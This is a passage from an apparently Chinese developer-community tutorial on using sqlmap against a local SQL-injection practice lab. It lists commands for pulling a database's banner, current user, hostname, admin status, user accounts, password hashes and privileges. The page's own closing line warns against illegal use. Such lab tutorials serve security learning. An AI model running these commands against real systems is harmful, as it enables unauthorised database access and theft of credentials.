AI 助理
备案控制台
开发者社区 数据库 文章 正文

注入工具 -- sqlmap(检索DBMS信息)

2024-02-22 260
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 注入工具 -- sqlmap(检索DBMS信息)

一、sqlmap检索DBMS Banner

–banner或者-b

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -b

0a2653c851af460fa595bd959398a8f1.png


二、sqlmap检索DBMS当前用户

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-user

0eacb84100b54626af849e6b562bf92a.png


三、sqlmap检索DBMS当前数据库

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --current-db

2d65d23f6d4748949b924e4057485923.png


四、sqlmap检索DBMS当前主机名

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --hostname

2e9b90b2ca334476abebe75bafe6eeaa.png


五、sqlmap探测当前用户是否是数据库管理员

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --is-dba

4cebaac233b3433da32a72337a77fc60.png


六、枚举DBMS用户

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --user

6de278e6d6694ce5bb08e7e842b7e74b.png


七、枚举DBMS用户密码

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --password

7a399525ddec4b77923c464820b33738 (1).png


八、枚举DBMS权限

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --role


7a399525ddec4b77923c464820b33738.png


sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --privileges


8ec4f2997fb246878c34ecd6d122b7c6.png


禁止非法,后果自负

文章标签:
数据库管理
数据库
数据安全/隐私保护
sumith
目录
相关文章
sumith
|
7月前
|
SQL
注入工具 -- sqlmap(自定义检测参数)
注入工具 -- sqlmap(自定义检测参数)
sumith
83 0
游客qsxez56gggwqy
|
2月前
|
SQL 安全 关系型数据库
SQL自动化注茹-SQLmap入门操作(二)
SQL自动化注茹-SQLmap入门操作(二)
游客qsxez56gggwqy
157 0
游客qsxez56gggwqy
|
2月前
|
SQL 安全 关系型数据库
SQL自动化注ru-SQLmap入门操作(一)
SQL自动化注ru-SQLmap入门操作(一)
游客qsxez56gggwqy
79 0
香甜可口草莓蛋糕
|
7月前
|
SQL 安全 关系型数据库
SQL 注入神器:SQLMap 参数详解
SQL 注入神器:SQLMap 参数详解
香甜可口草莓蛋糕
277 1
sumith
|
7月前
|
安全 数据库
注入工具 -- sqlmap(枚举信息)
注入工具 -- sqlmap(枚举信息)
sumith
67 0
sumith
|
7月前
|
SQL
​注入工具 -- sqlmap(获取目标)
​注入工具 -- sqlmap(获取目标)
sumith
64 0
sumith
|
7月前
注入工具 -- sqlmap(指定位置注入和优化性能)
注入工具 -- sqlmap(指定位置注入和优化性能)
sumith
118 0
sumith
|
7月前
|
SQL 关系型数据库 MySQL
注入工具 -- sqlmap(注入参数)
注入工具 -- sqlmap(注入参数)
sumith
118 0
小万哥丶
|
7月前
|
SQL 开发框架 安全
SQL 日期处理和视图创建:常见数据类型、示例查询和防范 SQL 注入方法
在数据库操作中,处理日期是一个关键的方面。确保插入的日期格式与数据库中日期列的格式匹配至关重要。以下是一些常见的SQL日期数据类型和处理方法。
小万哥丶
244 8
-编程工程师-
|
SQL 安全 关系型数据库
4 个单词,谷歌返回 16 个 SQL 注入漏洞...
一名开发者出于好奇在 Google 使用php mysql email register作为关键词进行了搜索。很显然,这是在查找如何使用 PHP 和 MySQL 实现邮箱注册的功能。
-编程工程师-
200 0
4 个单词,谷歌返回 16 个 SQL 注入漏洞...

热门文章

最新文章

  • 1
    基于区块链的机器学习模型创建方案
  • 2
    阿里云服务器ECS搭建个人网站新手教程(超详细)
  • 3
    上云,你需要了解的账号管理模型
  • 4
    RDS入门——Excel文件转存到RDS数据库实践
  • 5
    优秀的代码都是如何分层的?
  • 6
    3、Python与设计模式--建造者模式
  • 7
    跟阿里云技术专家阙寒一起深度了解视频直播CDN技术
  • 8
    当人工智能遇上区块链,会发生什么?
  • 9
    力挑VMWare 红帽推新虚拟化技术
  • 10
    Ext 4 概述(七)之面板Panel & 杂项
  • 1
    自学记录HarmonyOS Next DRM API 13:构建安全的数字内容保护系统
    42
  • 2
    《MaxFrame:数据处理的卓越实践与提升》
    55
  • 3
    《DataWorks:数据处理的卓越实践与改进思考》
    50
  • 4
    三维球体空间中光线反射模拟与三维点云提取matlab仿真
    46
  • 5
    《多模态数据信息提取解决方案的体验与部署》
    45
  • 6
    基于PSO优化的PV光伏发电系统simulink建模与仿真
    52
  • 7
    数据链中常见电磁干扰matlab仿真,对比噪声调频,线性调频,噪声,扫频,灵巧五种干扰模型
    47
  • 8
    《破局之路:人工智能产业的健康发展》
    38
  • 9
    《强化学习算法在动态环境中的优化之路》
    36
  • 10
    《大模型训练成本高,如何在不牺牲性能的前提下破局》
    40

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册

    • 相关实验场景

    更多
  • 使用SQL语句管理索引
    • 下一篇
    手把手教你白嫖阿里云服务器(免费领服务器)